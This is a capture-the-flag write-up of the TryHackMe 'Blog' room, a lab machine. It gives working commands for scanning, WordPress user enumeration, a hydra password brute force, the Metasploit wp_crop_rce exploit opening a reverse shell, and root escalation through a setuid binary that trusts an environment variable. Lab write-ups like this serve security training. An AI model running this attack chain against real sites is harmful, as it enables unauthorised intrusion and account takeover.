BLOG-TRYHACKME

 











This is a quick write-up for TryHackMe's room named - Blog.

The link for the room is :- https://tryhackme.com/room/blog

Do Entry in /etc/hosts
=================
⇒ 10.10.167.75 blog.thm

Enumeration
===========
⇒ nmap -sC -sV 10.10.167.75
• 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
• 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
• 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
• 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
• 8000/tcp open tcpwrapped
• 9000/tcp open tcpwrapped

Dir-busting
==========
⇒ /opt/tools/dirsearch/dirsearch.py -E -x 400,500 -t 100 -u http://10.10.167.75 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --recursive -R 2
• http://10.10.167.75/wp-includes/
• http://10.10.167.75/wp-content/uploads/
• http://10.10.167.75/wp-admin/

WPS Scan
=========
wpscan --url http://10.10.167.75

Possible Users
===========
wpscan --url http://10.10.167.75 --enumerate u
⇒ bjoel
⇒ kwheel

Brute Force Web login
==================
⇒ hydra -l kwheel -P /usr/share/wordlists/rockyou.txt 10.10.167.75http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.167.75%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username" -V
• [80][http-post-form] host: 10.10.29.244 login: kwheel password: *********


Exploit
=======
⇒ Read about CVE-2019-8943
https://www.exploit-db.com/exploits/46662
⇒ exploit/multi/http/wp_crop_rce 2019-02-19 excellent Yes WordPress Crop-image Shell Upload
msf5 exploit(multi/http/wp_crop_rce) > set PASSWORD *********
PASSWORD => cutiepie1
msf5 exploit(multi/http/wp_crop_rce) > set RHOSTS 10.10.167.75
RHOSTS => 10.10.167.75
msf5 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf5 exploit(multi/http/wp_crop_rce) > set LHOST tun0
LHOST => tun0
msf5 exploit(multi/http/wp_crop_rce) > run

⇒ Got a shell on box

⇒ Ran https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh on the target on got:
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/sbin/checker
---

⇒ Analyzed “/usr/sbin/checker” using Ghidra
undefined8 main(void)
{
char *pcVar1;
pcVar1 = getenv("admin");
if (pcVar1 == (char *)0x0) {
puts("Not an Admin");
}
else {
setuid(0);
system("/bin/bash");
}
return 0;
}

Privilege Escalation
================
⇒ Set “admin” as an Environment Variable to get root
www-data@blog:/var/www/wordpress$ export admin=admin
export admin=admin
----
www-data@blog:/var/www/wordpress$ env
env
APACHE_LOG_DIR=/var/log/apache2
LANG=C
INVOCATION_ID=d3c286c9b4424d8b9ebc8550ed0c5a13
APACHE_LOCK_DIR=/var/lock/apache2
PWD=/var/www/wordpress
JOURNAL_STREAM=9:20804
APACHE_RUN_GROUP=www-data
APACHE_RUN_DIR=/var/run/apache2
admin=admin
APACHE_RUN_USER=www-data
APACHE_PID_FILE=/var/run/apache2/apache2.pid
SHLVL=1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
_=/usr/bin/env
www-data@blog:/var/www/wordpress$
----
www-data@blog:/var/www/wordpress$ /usr/sbin/checker
/usr/sbin/checker
root@blog:/var/www/wordpress# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@blog:/var/www/wordpress#


Search for flags
=============
⇒ find / -name root.txt 2>/dev/null
⇒ find / -name user.txt 2>/dev/null

All Done :)




Comments

Popular Posts